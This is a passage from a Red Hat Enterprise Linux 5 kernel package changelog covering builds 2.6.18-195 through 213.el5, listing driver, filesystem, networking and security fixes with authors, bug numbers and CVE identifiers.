(Amit Shah) [620037]\n[2.6.18-213.el5]\n- [mm] pass correct mm when growing stack (Jiri Pirko) [607858] {CVE-2010-2240}\n- [mm] fix up some user-visible effects of stack guard page (Jiri Pirko) [607858] {CVE-2010-2240}\n- [mm] fix page table unmap for stack guard page properly (Jiri Pirko) [607858] {CVE-2010-2240}\n- [mm] fix missing unmap for stack guard page failure case (Jiri Pirko) [607858] {CVE-2010-2240}\n- [mm] keep a guard page below a grow-down stack segment (Jiri Pirko) [607858] {CVE-2010-2240}\n- [net] tcp: fix div by zero in congestion control protos (Neil Horman) [608641]\n- [net] tcp: tcp_vegas ssthresh bug fix (Thomas Graf) [612709]\n- [net] tcp: tcp_vegas cong avoid fix (Thomas Graf) [612709]\n- [net] tcp: fix overflow bug in Vegas (Thomas Graf) [612709]\n- [net] tcp: fix Vegas bug in disabling slow start (Thomas Graf) [612709]\n- [net] tcp: increase Vegas default alpha and beta params (Thomas Graf) [612709]\n- [net] tcp: tcp_hybla zero congestion window growth fix (Thomas Graf) [612709]\n- [net] tcp: htcp last_cong bug fix (Thomas Graf) [612709]\n- [net] tcp: TCP cubic v2.2 (Thomas Graf) [612709]\n- [net] tcp: faster cube root (Thomas Graf) [612709]\n- [net] tcp: backport cubic update for net-2.6.22 (Thomas Graf) [612709]\n- [net] tcp: set Cubic and BIC default thresholds to zero (Thomas Graf) [612709]\n- [net] tcp: congestion control initialization (Thomas Graf) [612709]\n- [net] tcp: uninline tcp_is_cwnd_limited (Thomas Graf) [612709]\n- [net] tcp: move prior_in_flight collect to better spot (Thomas Graf) [612709]\n- [fs] ext4: consolidate in_range definitions (Eric Sandeen) [624332] {CVE-2010-3015}\n- [net] dont double count UDP_INERRORS (Neil Horman) [618818]\n- [scsi] be2iscsi: sync with upstream for RHEL5.6 (Mike Christie) [569643]\n- [mmc] sdhci: fix system cannot enter S4 with SD card (Matthew Garrett) [606899]\n- [cpufreq] powernow-k8: support AMD Core Performance Boost (Matthew Garrett) [568751]\n- [fs] cifs: remove force parm from cifs_unix_info_to_inode (Jeff Layton) [619112]\n- [fs] nfs: fix NFS4ERR_FILE_OPEN handling in Linux/NFS (Jeff Layton) [604044]\n- [usb] fix test of wrong variable in create_by_name (Don Howard) [594635]\n- [s390] cio: fix cause of unexpected recovery actions (Hendrik Brueckner) [621330]\n[2.6.18-212.el5]\n- [ipmi] add parameter to limit CPU usage in kipmid (Takao Indoh) [494680]\n- [net] bnx2x: Added GRO support (Stanislaw Gruszka) [573114]\n- [net] bnx2x: fix memory barriers (Stanislaw Gruszka) [569370]\n- [ppc] partition hibernation support (Steve Best) [565570]\n- [ppc] Add resume handler to powerpc time management code (Steve Best) [565570]\n- [scsi] ibmvscsi: Fix soft lockup on resume (Steve Best) [565570]\n- [scsi] ibmvfc: Fix soft lockup on resume (Steve Best) [565570]\n- [scsi] ibmvfc: Add suspend/resume support (Steve Best) [565570]\n- [scsi] ibmvscsi: Add suspend/resume support (Steve Best) [565570]\n- [net] ibmveth: Add suspend/resume support (Steve Best) [565570]\n- [ppc] vio: add power management support (Steve Best) [565570]\n- [ppc] add hooks to put CPU in appropriate offline state (Steve Best) [565570]\n- [virt] xen: fix passthrough of SR-IOV VF (Paolo Bonzini) [582886]\n- [mm] add option to skip ZERO_PAGE mmap of /dev/zero (Larry Woodman) [619541]\n- [net] bonding: check if clients MAC addr has changed (Flavio Leitner) [610234]\n- [virt] xen: fix pud_present compile warnings (Don Zickus) [590760]\n- [xen] CPU synchronization during MTRR register update (Don Dugger) [594546]\n[2.6.18-211.el5]\n- [pci] fix remove of proc entry for hotplug devices (Wade Mealing) [618114]\n- [ide]: atiixp: no pio autotune on AMD Hudson2 (Prarit Bhargava) [618075]\n- [pci] msi: add option for lockless interrupt mode (Prarit Bhargava) [599295]\n- [virt] xenbus: implement O_NONBLOCK (Paolo Bonzini) [470801]\n- [net] ip4v/tcp: no additional reset on closed sockets (Neil Horman) [605259]\n- [misc] xen: fix migration using xen-vnif in smp hvm guest (Miroslav Rezanina) [555910]\n- [edac] fix i7core_edac in multi-socket systems (Mauro Carvalho Chehab) [468877]\n- [net] arp_tables: fix unaligned accesses (Jiri Pirko) [582268]\n- [fs] ext3: handle journal_start failure properly (Josef Bacik) [588599]\n- [misc] handle dead hung uninterruptible tasks correctly (Jerome Marchand) [582237]\n- [fs] ecryptfs: fix ecryptfs_uid_hash buffer overflow (Jerome Marchand) [611387] {CVE-2010-2492}\n- [infiniband] check local reserved ports (Jerome Marchand) [557884]\n- [infiniband] randomize local port allocation (Jerome Marchand) [557884]\n- [net] reserve ports for apps using fixed port numbers (Jerome Marchand) [557884]\n- [kernel] sysctl: add proc_do_large_bitmap (Jerome Marchand) [557884]\n- [scsi] lpfc: use kernel-provided random32 (Jarod Wilson) [605816]\n- [lib] make tausworthe random32 generator available to all (Jarod Wilson) [605816]\n- [net] be2net: increase POST timeout for EEH recovery (Ivan Vecera) [616512]\n- [hwmon] coretemp: get TjMax value from MSR (Dean Nelson) [580699]\n- [hwmon] coretemp: detect the thermal sensors by CPUID (Dean Nelson) [580699]\n- [fs] xfs: rename XFS_IGET_BULKSTAT to XFS_IGET_UNTRUSTED (Dave Chinner) [607032]\n- [fs] xfs: validate untrusted inode numbers during lookup (Dave Chinner) [607032]\n- [fs] xfs: always use iget in bulkstat (Dave Chinner) [607032]\n- [s390] qeth: support for OSA CHPID types OSX and OSM (Hendrik Brueckner) [599644]\n- [s390] qeth: dont allow layer switch with open interface (Hendrik Brueckner) [612195]\n- [s390] zfcp: fix reference counting on adisc (Hendrik Brueckner) [610089]\n- [s390] kernel: initrd vs bootmem bitmap (Hendrik Brueckner) [610837]\n- [s390] hypfs: fix high cpu time output (Hendrik Brueckner) [589282]\n- [s390] dasd: fix race between tasklet and dasd_sleep_on (Hendrik Brueckner) [593756]\n- [s390] cmm: fix module unload handling (Hendrik Brueckner) [598549]\n- [fs] gfs: clean up stuffed file data copy handling (Abhijith Das) [580867]\n[2.6.18-210.el5]\n- [scsi] ips driver sleeps while holding spin_lock (Steve Best) [616961]\n- [net] fix lockups and dupe addresses w/bonding and ipv6 (Shyam Iyer) [516985]\n- [scsi] megaraid_sas: update driver to version 4.31 (Tomas Henzl) [564249]\n- [scsi] megaraid_sas: update driver to version 4.27 (Rob Evers) [564249]\n- [net] nat: avoid rerouting packets if only key changed (Jiri Pirko) [566144]\n- [fs] cifs: remove bogus check in NTLM session setup code (Jeff Layton) [479418]\n- [ata] ahci: add em_buffer attribute for AHCI hosts (David Milburn) [568364]\n- [scsi] qla4xxx: add support for ISP82XX (Chad Dupuis) [546592]\n- [scsi] qla4xxx: Fixes from upstream for 5.6 (Chad Dupuis) [546592]\n- [scsi] qla2xxx: more upstream updates for RHEL 5.6 (Chad Dupuis) [567428]\n- [scsi] qla2xxx: add support for ISP82XX (Chad Dupuis) [567428]\n- [scsi] qla2xxx: more updates from upstream for RHEL 5.6 (Chad Dupuis) [567428]\n- [scsi] qla2xxx: update to 8.03.01.05.05.06-k (Chad Dupuis) [567428]\n- [xen] correct bitsize calculation for 32-on-64 (Andrew Jones) [616827]\n[2.6.18-209.el5]\n- [net] r8169: fix for broken register writes (Ivan Vecera) [581654]\n- [serial] remove contact info for ite887x chip support (Dean Nelson) [563271]\n- [serial] fix modpost warning in ite887x driver (Dean Nelson) [563271]\n- [serial] add support for ite887x chips (Dean Nelson) [563271]\n- [parport] increase ite887xs I/O port range (Dean Nelson) [563271]\n- [scsi] qla2xxx: update firmware to version 5.03.02 (Chad Dupuis) [578444 598946]\n- [fs] cifs: reject DNS upcall add_key req from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n- [security] keys: new key flag for add_key from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n[2.6.18-208.el5]\n- [fs] gfs2: fix rename causing kernel oops (Robert S Peterson) [602025]\n- [misc] io_apic: skip timer_irq_works check when on VMware (Prarit Bhargava) [575309]\n- [scsi] be2iscsi: fix for 64k data length sge (Mike Christie) [608801]\n- [mm] fix excessive memory reclaim from zones w/lots free (Larry Woodman) [604779]\n- [mm] properly release all hugepages on database shutdown (Larry Woodman) [593131]\n- [net] fix accept_local handling for dev with no xattrs (Jiri Olsa) [601370]\n- [fs] nfs: i_nlinks changes must set NFS_INO_INVALID_ATTR (Jeff Layton) [601800]\n- [fs] nfs: fix resolution in nfs_inode_attrs_need_update (Jeff Layton) [601800]\n- [fs] nfs: fix compiler warnings introduced recently (Jeff Layton) [601800]\n- [fs] nfs: fix attribute updates even more (Jeff Layton) [601800]\n- [fs] nfs: fix the NFS attribute update (Jeff Layton) [601800]\n- [fs] nfs: clean up inode handling functions (Jeff Layton) [601800]\n- [fs] nfs: nfs_refresh_inode should clear cache_validity (Jeff Layton) [601800]\n- [fs] nfs: use nfs_refresh_inode in __nfs_revalidate_inode (Jeff Layton) [601800]\n- [ata] ahci, pata_marvell: fixup competition for PATA port (David Milburn) [237372]\n- [net] qlcnic: Add QLCNIC to Kconfig and Makefile (Chad Dupuis) [562723]\n- [net] qlcnic: enable building driver module (Chad Dupuis) [562723]\n- [net] qlcnic: remove extra space from board names (Chad Dupuis) [562723]\n- [net] qlcnic: fix bios version check (Chad Dupuis) [562723]\n- [net] qlcnic: validate unified fw image (Chad Dupuis) [562723]\n- [net] qlcnic: fix multicast handling (Chad Dupuis) [562723]\n- [net] qlcnic: additional driver statistics. (Chad Dupuis) [562723]\n- [net] qlcnic: fix tx csum status (Chad Dupuis) [562723]\n- [net] qlcnic: add loopback diagnostic test (Chad Dupuis) [562723]\n- [net] qlcnic: add interrupt diagnostic test (Chad Dupuis) [562723]\n- [net] qlcnic: support LED blink for device identification (Chad Dupuis) [562723]\n- [net] qlcnic: protect resoruce cleanup by rtnl lock (Chad Dupuis) [562723]\n- [net] qlcnic: clear device reset state after fw recovery (Chad Dupuis) [562723]\n- [net] qlcnic: add ethernet identifier in board info (Chad Dupuis) [562723]\n- [net] qlcnic: use DEFINE_PCI_DEVICE_TABLE (Chad Dupuis) [562723]\n- [net] qlcnic: add Qlogic ethernet driver for CNA devices (Chad Dupuis) [562723]\n- Revert: [fs] cifs: reject DNS upcall add_key req from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n- Revert: [security] keys: new key flag for add_key from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n[2.6.18-207.el5]\n- [usb] uhci: fix oops in uhci_scan_schedule (Pete Zaitcev) [516851]\n- [wireless] rtl818x: use cancel_work_sync (Stanislaw Gruszka) [582191]\n- [wireless] iwlwifi: use cancel_work_sync (Stanislaw Gruszka) [582191]\n- [wireless] ath9k: use cancel_work_sync (Stanislaw Gruszka) [582191]\n- [wireless] rt2x00: use cancel_work_sync (Stanislaw Gruszka) [582191]\n- Revert: [wireless] rt2x00: fix work cancel race condition (Stanislaw Gruszka) [582191]\n- [wireless] use cancel_work_sync in mac80211 and core (Stanislaw Gruszka) [582191]\n- [misc] workqueue: add cancel_work_sync to include (Stanislaw Gruszka) [582191]\n- [net] igb: drop support for UDP hashing w/ RSS (Stefan Assmann) [613780]\n- [misc] signals: avoid unnecessary credentials check (Oleg Nesterov) [459901]\n- [acpi] tell platformthat we support fixed hw T-states (Matthew Garrett) [569590]\n- [edac] i7core_edac: Backport driver to RHEL5 (Mauro Carvalho Chehab) [468877]\n- [edac] i7core_edac: add driver for new Nehalem (Mauro Carvalho Chehab) [468877]\n- [x86_64] mce: fix misplaced 'continue' in mce.c (Mauro Carvalho Chehab) [468877]\n- [pci] Add a probing code that seeks for an specific bus (Mauro Carvalho Chehab) [468877]\n- [edac] add support for DDR3 at EDAC core (Mauro Carvalho Chehab) [468877]\n- [wireless] Kconfig: select WIRELESS_COMPAT as needed (John Linville) [583767]\n- [i386] oprofile: fix detection of Intel CPU family 6 (John Villalovos) [581919]\n- [misc] intel: support for Intel Cougar Point Chipset (John Villalovos) [566854]\n- [fs] xfs: dont let swapext operate on write-only files (Jiri Pirko) [605161] {CVE-2010-2226}\n- [fs] nfs: fix bug in nfsd4 read_buf (Jiri Olsa) [612035] {CVE-2010-2521}\n- [fs] nfsd: add lockdep annotation to nfsd4 recover code (Jeff Layton) [567092]\n- [fs] nfs: wait for close before silly-renaming (Jeff Layton) [565974]\n- [fs] cifs: enable CONFIG_CIFS_STATS (Jeff Layton) [574795]\n- [net] sunrpc: translate an -ENETUNREACH to -ENOTCONN (Jeff Layton) [481372]\n- [fs] cifs: merge CIFSSMBQueryEA with CIFSSMBQAllEAs (Jeff Layton) [527268]\n- [fs] cifs: verify lengths of QueryAllEAs reply (Jeff Layton) [527268]\n- [fs] cifs: increase maximum buffer size in CIFSSMBQAllEAs (Jeff Layton) [527268]\n- [fs] cifs: rename name_len to list_len in CIFSSMBQAllEAs (Jeff Layton) [527268]\n- [fs] cifs: clean up indentation in CIFSSMBQAllEAs (Jeff Layton) [527268]\n- [fs] cifs: reject DNS upcall add_key req from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n- [fs] cifs: add parens around smb_var in BCC macros (Jeff Layton) [527268]\n- [security] keys: new key flag for add_key from userspace (Jeff Layton) [612171] {CVE-2010-2524}\n- [specfile] skip xen tarball and patching if building w/o xen (Jarod Wilson)\n- [specfile] replace ancient and deprecated rpm syntax (Jarod Wilson)\n- [virt] xen: remove sysdata hack from irq-xen.c (Paolo Bonzini) [561390]\n- [xen] msi fixmap cleanup and vector teardown (Don Dugger) [516236]\n[2.6.18-206.el5]\n- [x86] kprobes: introduce kprobes jump optimization (Masami Hiramatsu) [516313]\n- [x86] add x86_64 alternatives_text_reserved interface (Masami Hiramatsu) [516313]\n- [x86_64] kprobes: upstream update for rhel5.6 (Masami Hiramatsu) [516313]\n- [x86_64] add instruction decoder API (Masami Hiramatsu) [516313]\n- [fusion] mpt: fix deregister calls in exit path (hiro muneda) [581523]\n- [net] cxgb3: wait longer for control packets on init (Steve Best) [587670]\n- [scsi] scsi_dh_alua: add IBM Power Virtual SCSI ALUA dev (Steve Best) [567292]\n- [fs] gfs2: fix stuck in inode wait, no glocks stuck (Robert S Peterson) [595397]\n- [message] mptsas: fix disk add failing due to timeout (Rob Evers) [542892]\n- [scsi] lpfc: update from 8.2.0.73.1p to 8.2.0.76.1p (Rob Evers) [591674]\n- [scsi] lpfc: update from 8.2.0.63.p3 to 8.2.0.73.1p (Rob Evers) [571862]\n- [i2c] fix exports types for recently added i2c symbols (Prarit Bhargava) [611774]\n- [virt] xen: fix 32-bit syscalls on 64-bit kernel (Paolo Bonzini) [561394]\n- [virt] xen: add tracepoint for kernel pagefault event (Paolo Bonzini) [561385]\n- [security] selinux: fix race with re-parenting (Oleg Nesterov) [556675]\n- [net] sctp: fix length checks (Neil Horman) [605305]\n- [acpi] intel: avoid skipping ARB_DISABLE on model 0x0e (Matthew Garrett) [602846]\n- [block] cfq-iosched: fix bad locking in changed_ioprio (Jeff Moyer) [582435]\n- [block] cfq-iosched: kill cfq_exit_lock (Jeff Moyer) [582435]\n- [fs] cifs: fix kernel BUG with remote OS/2 server (Jeff Layton) [608588] {CVE-2010-2248}\n- [fs] cifs: dont try busy-file rename unless in same dir (Jeff Layton) [603706]\n- [fs] nfsd: dont break lease while servicing COMMIT call (Jeff Layton) [575817]\n- [fs] force target reval when following LAST_BIND symlinks (Jeff Layton) [571518]\n- [net] be2net: update to v2.102.348r with SR-IOV support (Ivan Vecera) [568388]\n- [net] virtio_net: add set_multicast_list (Herbert Xu) [552574]\n- [net] gro: fix bogus gso_size on the first fraglist entry (Herbert Xu) [588015]\n- [time] fix softlockups in RHEL5 virt guests (Glauber Costa) [607443]\n- [time] count ticks when loss gt cycle_accounted_limit (Glauber Costa) [584679]\n- [net] e1000e: dont inadvertently re-set INTX_DISABLE (Dean Nelson) [496127]\n- [scsi] fixup size on read capacity failure (David Milburn) [569654]\n- [s390] smsgiucv: add missing check for z/VM (Hendrik Brueckner) [590737]\n- [s390] zcore: fix reipl device detection (Hendrik Brueckner) [587027]\n- [s390] zcrypt: print error message for 8/72 error (Hendrik Brueckner) [563545]\n- [s390] kernel: fix dump indicator (Hendrik Brueckner) [546288]\n- [net] bluetooth: fix possible bad memory access via sysfs (Mauro Carvalho Chehab) [576021] {CVE-2010-1084}\n[2.6.18-205.el5]\n- [scsi] ipr: adds PCI ID definitions for new adapters (Steve Best) [563589]\n- [scsi] ipr: add support for new IOASCs (Steve Best) [563589]\n- [scsi] ipr: add support for multiple stages of init (Steve Best) [563589]\n- [scsi] ipr: implement shutdown changes (Steve Best) [563589]\n- [scsi] ipr: hardware assisted smart dump functionality (Steve Best) [563589]\n- [scsi] ipr: add error handling updates for next gen chip (Steve Best) [563589]\n- [scsi] ipr: update the config table for next gen chip (Steve Best) [563589]\n- [scsi] ipr: define register offsets for next gen chip (Steve Best) [563589]\n- [scsi] ipr: add command structures for next gen chip (Steve Best) [563589]\n- [scsi] ipr: differentiate pci-x and pci-e based adapters (Steve Best) [563589]\n- [scsi] ipr: add test for MSI interrupt support (Steve Best) [563589]\n- [scsi] ipr: add message to error table (Steve Best) [563589]\n- [scsi] ipr: handle logically bad block write errors (Steve Best) [563589]\n- [scsi] ipr: convert to use the data buffer accessors (Steve Best) [563589]\n- [scsi] ipr: add some defines that are missing in RHEL5.5 (Steve Best) [563589]\n- [scsi] ipr: add workaround for MSI interrupts on P7 (Steve Best) [572333]\n- [net] tcp: fix rcv mss estimate for lro (Stanislaw Gruszka) [593801]\n- [virt] xen netback: copy skbuffs if head crosses pages (Paolo Bonzini) [578259]\n- [virt] xen: handle softirqs at end of event processing (Paolo Bonzini) [564523]\n- [virt] fix tsccount clocksource under kvm guests (Glauber Costa) [581396]\n- [net] benet: compat header cleanups, part 2 (Ivan Vecera) [546740]\n- [net] benet: compat header cleanups, part 1 (Prarit Bhargava) [546740]\n- [net] bnx2: compat header cleanups (Prarit Bhargava) [546740]\n- [net] e1000/e1000e: compat header cleanup (Prarit Bhargava) [546740]\n- [net] enic: compat header cleanup (Prarit Bhargava) [546740]\n- [net] forcedeth: compat header cleanup (Prarit Bhargava) [546740]\n- [net] igb: compat header cleanups (Prarit Bhargava) [546740]\n- [net] ixgbe: compat header cleanups (Prarit Bhargava) [546740]\n- [net] myri10ge: compat header cleanups (Prarit Bhargava) [546740]\n- [net] netxen: compat header cleanup (Prarit Bhargava) [546740]\n- [net] niu: compat header cleanup (Prarit Bhargava) [546740]\n- [net] qlge: compat header cleanup (Prarit Bhargava) [546740]\n- [net] r8169: compat header cleanups, part 2 (Ivan Vecera) [546740]\n- [net] r8169: compat header cleanups, part 1 (Prarit Bhargava) [546740]\n- [net] sfc: compat header cleanups (Prarit Bhargava) [546740]\n- [net] sky2: compat header cleanup (Prarit Bhargava) [546740]\n- [net] tg3: compat header cleanup (Prarit Bhargava) [546740]\n- [net] bonding: compat header cleanup (Prarit Bhargava) [546740]\n- [net] move compat header file contents to proper includes (Prarit Bhargava) [546740]\n- [net] ethernet: compat header cleanups (Prarit Bhargava) [546740]\n- [net] chelsio: compat header cleanups (Prarit Bhargava) [546740]\n- [net] s2io: compat header cleanups (Prarit Bhargava) [546740]\n- [net] vxge: compat header cleanup (Prarit Bhargava) [546740]\n- [infiniband] compat header cleanups (Prarit Bhargava) [546740]\n- [scsi] compat header cleanups (Prarit Bhargava) [546740]\n- [misc] readq/writeq compat header cleanup (Prarit Bhargava) [546740]\n- [pci] compat header cleanups (Prarit Bhargava) [546740]\n- [misc] compat.h cleanup: add cancel_delayed_work_sync (Prarit Bhargava) [546740]\n- [i2c] compat header cleanups (Prarit Bhargava) [546740]\n- [fs] nfs: fix memory leak when using -onolock on nfs v2/3 (Jeff Layton) [592908]\n[2.6.18-204.el5]\n- [fs] gfs2: fix ordering of ordered writes (Steven Whitehouse) [581013]\n- [net] cnic: fix bnx2x panic w/multiple interfaces enabled (Stanislaw Gruszka) [602402]\n- [x86_64] unify apic mapping code (Prarit Bhargava) [573858]\n- [virt] xen: fix Connected state after netback dev closed (Paolo Bonzini) [591548]\n- [net] ipv4: add sysctl to accept packets w/local source (Jiri Olsa) [601370]\n- [nfs] fix unitialized list head on error exit in recovery (Jeff Layton) [569342]\n- [virt] virtio_blk: add support for cache flushes (Christoph Hellwig) [571735]\n- [xen] ia64: unset be from the task psr (Andrew Jones) [587477] {CVE-2010-2070}\n[2.6.18-203.el5]\n- [misc] permit larger than 2TB USB and FW drives (Pete Zaitcev) [503864]\n- [net] cnic: fix panic when nl msg rcvd when device down (Stanislaw Gruszka) [595862]\n- [infiniband] ehca: require in_wc in process_mad (Steve Best) [571517]\n- [net] igb: Add support for pci-e Advanced Error Reporting (Stefan Assmann) [568221]\n- [fs] ext4: MOVE_EXT cant overwrite append-only files (Eric Sandeen) [601008] {CVE-2010-2066}\n- [net] wireless: convert reg_regdb_search_lock to mutex (John Linville) [597334]\n- [net] tcp: dont send keepalive probes if receiving data (Flavio Leitner) [593040]\n- [hwmon] add support for additional CPU models to coretemp (Dean Nelson) [559228]\n- [fs] gfs2: use -EUSERS when mounting w/o enough journals (Abhijith Das) [600387]\n- [misc] workqueue: make cancel_work_sync EXPORT_SYMBOL_GPL (Oleg Nesterov) [596626]\n[2.6.18-202.el5]\n- [fs] gfs2: fix permissions checking for setflags ioctl (Steven Whitehouse) [595399] {CVE-2010-1641}\n- [mm] clear page errors when issuing a fresh read of page (Rik van Riel) [590763]\n- [misc] keys: do not find already freed keyrings (Vitaly Mayatskikh) [585100] {CVE-2010-1437}\n- [misc] workqueue: silence kabi checker (Stanislaw Gruszka) [596626]\n- [misc] workqueue: implement cancel_work_sync (Oleg Nesterov) [596626]\n- [misc] workqueue: implement try_to_grab_pending (Oleg Nesterov) [596626]\n- [misc] workqueue: prep flush_cpu_workqueue for additions (Oleg Nesterov) [596626]\n- [misc] workqueue: implement wait_on_work (Oleg Nesterov) [596626]\n- [misc] workqueue: add set_wq_data and get_wq_data helpers (Oleg Nesterov) [596626]\n- [misc] workqueue: cwq instead of wq where appropriate (Oleg Nesterov) [596626]\n- [misc] workqueue: initial prep for cancel_work_sync (Oleg Nesterov) [596626]\n- [net] sctp: file must be valid before setting timeout (Jiri Pirko) [578261]\n- [net] tg3: fix panic in tg3_interrupt (John Feeney) [569106]\n- [net] e1000/e1000e: implement simple interrupt moderation (Andy Gospodarek) [586416]\n- [virt] dont compute pvclock adjustments if we trust tsc (Glauber Costa) [570824]\n- [virt] add a global synchronization point for pvclock (Glauber Costa) [570824]\n- [virt] enable pvclock flags in vcpu_time_info structure (Glauber Costa) [570824]\n- [misc] add atomic64_cmpxcgh to x86_64 include files (Glauber Costa) [570824]\n- [x86] grab atomic64 types from upstream (Glauber Costa) [570824]\n- [pci] cleanup error return for pcix get/set mmrbc calls (Dean Nelson) [578492]\n- [pci] fix pcix access of PCI_X_CMD get/set mmrbc calls (Dean Nelson) [578492]\n- [pci] fix return value from pcix_get_max_mmrbc() (Dean Nelson) [578492]\n- [pci] prepare for backport of upstream fixes and cleanup (Dean Nelson) [578492]\n- [net] ipv6: fix more memory leaks when ndisc_init fails (Amerigo Wang) [555338]\n- [xen] bring back VMXE/SVME flags (Andrew Jones) [570091]\n[2.6.18-201.el5]\n- [s390] qdio: continue polling for buffer state ERROR (Hendrik Brueckner) [565531]\n- [pci] acpiphp: fix missing acpiphp_glue_exit (Prarit Bhargava) [515556]\n- [net] cnic: Fix crash during bnx2x MTU change (Stanislaw Gruszka) [582367]\n- [net] bxn2x: add dynamic lro disable support (Stanislaw Gruszka) [582367]\n- [net] implement dev_disable_lro api for RHEL5 (Stanislaw Gruszka) [582367]\n[2.6.18-200.el5]\n- [fs] getrusage: fill ru_maxrss value (Amerigo Wang) [466157]\n- [net] bonding: fix broken multicast with round-robin mode (Andy Gospodarek) [570645]\n- [usb] input: fix keyboard LEDs on all the time (Pete Zaitcev) [513934]\n- [x86_64] fix time drift due to faulty lost tick tracking (Ulrich Obergfell) [579711]\n- [cciss] remove extraneous printk (Tomas Henzl) [582465]\n- [sunrpc] fix AUTH_SYS using sec=sys export option (Sachin Prabhu) [573652]\n- [misc] fix itimers periodic tics precision (Stanislaw Gruszka) [441134]\n- [net] tg3: fix INTx fallback when MSI fails (Steve Best) [587666]\n- [fs] quota: fix possible infinite loop in quota code (Eric Sandeen) [546060]\n- [misc] add {thread,core}_siblings_list to /sys (Prarit Bhargava) [570610]\n- [misc] add /sys/devices/system/node/nodeX/cpulist files (Prarit Bhargava) [572285]\n- [net] tun: orphan an skb on tx (Michael S. Tsirkin) [584412]\n- [edac] fix panic when a corrected error happens on i5000 (Mauro Carvalho Chehab) [533391]\n- [net] iwlwifi: re-enable IWLWIFI_LEDS (John Linville) [582003]\n- [net] calc TCPs connection closethreshold as time value (Jiri Pirko) [582722]\n- [net] sched: fix SFQ qdisc crash w/limit of 2 packets (Jiri Pirko) [579774]\n- [net] missed and reordered checks in {arp,ip,ip6}_tables (Jiri Pirko) [554563]\n- [net] neigh: fix state transitions via Netlink request (Jiri Pirko) [485903]\n- [net] route: fix BUG_ON in rt_secret_rebuild_oneshot (Jiri Olsa) [566104]\n- [net] netfilter: fix vmalloc ENOMEM caused by iptables (Jiri Olsa) [570491]\n- [block] cciss: fix multi-line printk log level (Jerome Marchand) [556921]\n- [nfs] revert retcode check in nfs_revalidate_mapping() (Jeff Layton) [557423]\n- [nfs] dont decode GETATTR if DELEGRETURN returned error (Jeff Layton) [551028]\n- [md] dm-log: fix bad log status after failure (Jonathan E Brassow) [570583]\n- [net] igmp: fix ip_mc_sf_allow race (Flavio Leitner) [552886]\n- [hwmon] add 0x prefix to hex coretemp module output (Dean Nelson) [571864]\n- [net] e1000e: fix WoL init when WoL disabled in EEPROM (Dean Nelson) [568562]\n- [ata] libata: handle semb signature (David Milburn) [533093]\n- [ata] libata-acpi: missing _SDD is not an error (David Milburn) [559815]\n- [scsi] sg: rate limit warning (Doug Ledford) [536937]\n- [net] tun: check supplemental groups in TUN/TAP driver (Danny Feng) [540786]\n- [s390] nss: add missing .previous call to asm function (Hendrik Brueckner) [581522]\n- [misc] lockdep: dump stack when hitting a limit (Amerigo Wang) [546554]\n- [net] ipv6: dont panic when kmem_cache_create fails (Amerigo Wang) [555338]\n- [misc] ipc: HARD_MSGMAX should be higher on 64bit (Amerigo Wang) [548334]\n- [fs] gfs2: make quota file size a multiple of gfs2_quota (Abhijith Das) [546455]\n[2.6.18-199.el5]\n- [mm] fix hugepage corruption using vm.drop_caches (Larry Woodman) [579469]\n- [misc] taskstats: enable CONFIG_TASK_XACCT (Jiri Olsa) [516961]\n- [misc] taskstats: new structure/cmd to avoid KABI break (Jiri Olsa) [516961]\n- [misc] taskstats: common fix for KABI breakage (Jiri Olsa) [516961]\n- [misc] taskstats: upgrade to version 4 (Jiri Olsa) [516961]\n- [misc] futex: handle futex value corruption gracefully (Jerome Marchand) [480396] {CVE-2010-0622}\n- [misc] futex: handle user space corruption gracefully (Jerome Marchand) [480396] {CVE-2010-0622}\n- [misc] futex: fix fault handling in futex_lock_pi (Jerome Marchand) [480396] {CVE-2010-0622}\n- [x86] utrace: block-step fix (Jerome Marchand) [463950]\n- [nfs] dont unhash dentry in nfs_lookup_revalidate (Jeff Layton) [582321]\n- [net] sunrpc: fix panic when reloading rpcsec_gss_krb5 (Harshula Jayasuriya) [570044]\n- [net] bonding: fix updating of speed/duplex changes (Andy Gospodarek) [567604]\n- [net] e1000: fix WoL init when WoL disabled in EEPROM (Dean Nelson) [568561]\n- [ata] ahci: support FIS-based switching (David Milburn) [474294]\n- [audit] make sure filterkey rules are reported (Alexander Viro) [579479]\n- [audit] clean up rule ordering, part 2 (Alexander Viro) [579479]\n- [audit] clean up rule ordering, part 1 (Alexander Viro) [579479]\n- [audit] fix selinux_audit_rule_update w/audit_inode_hash (Alexander Viro) [579479]\n- [virtio] fix GFP flags passed by virtio balloon driver (Amit Shah) [584683]\n- [net] sctp: fix skb_over_panic w/too many unknown params (Neil Horman) [584658] {CVE-2010-1173}\n- [xen] arpl on MMIO area crashes the guest (Paolo Bonzini) [572982] {CVE-2010-0730}\n[2.6.18-198.el5]\n- [acpi] warn on hot-add of memory exceeding 4G boundary (Prarit Bhargava) [571544]\n- [net] tipc: fix various oopses in uninitialized code (Neil Horman) [558693] {CVE-2010-1187}\n- [acpi] fix WARN on unregister in power meter driver (Matthew Garrett) [576246]\n- [block] cfq-iosched: fix IOPRIO_CLASS_IDLE accounting (Jeff Moyer) [574285]\n- [block] cfq-iosched: async queue allocation per priority (Jeff Moyer) [574285]\n- [block] cfq-iosched: fix async queue behaviour (Jeff Moyer) [574285]\n- [block] cfq-iosched: propagate down request sync flag (Jeff Moyer) [574285]\n- [block] introduce the rq_is_sync macro (Jeff Moyer) [574285]\n- [fs] vfs: fix LOOKUP_FOLLOW on automount symlinks (Jeff Layton) [567816] {CVE-2010-1088}\n- [nfs] fix an oops when truncating a file (Jeff Layton) [567195] {CVE-2010-1087}\n- [net] bnx2: fix lost MSI-X problem on 5709 NICs (John Feeney) [511368]\n- [misc] make the keyring quotas controllable via /proc/sys (Amerigo Wang) [441243]\n- [fs] fix kernel oops while copying from ext3 to gfs2 (Abhijith Das) [555754] {CVE-2010-1436}\n[2.6.18-197.el5]\n- [cpu] fix boot crash in 32-bit install on AMD cpus (Bhavna Sarathy) [575799]\n[2.6.18-196.el5]\n- [mm] fix boot on s390x after bootmem overlap patch (Amerigo Wang) [550974]\n- [net] bnx2: avoid restarting cnic in some contexts (Andy Gospodarek) [554706]\n- [misc] add missing CVE labels for entries in 2.6.18-195.el5 (Jarod Wilson)\n[2.6.18-195.el5]\n- [redhat] make sha512hmac sig failure more obvious (Jarod Wilson)\n- [mm] keep get_unmapped_area_prot functional (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] switch do_brk to 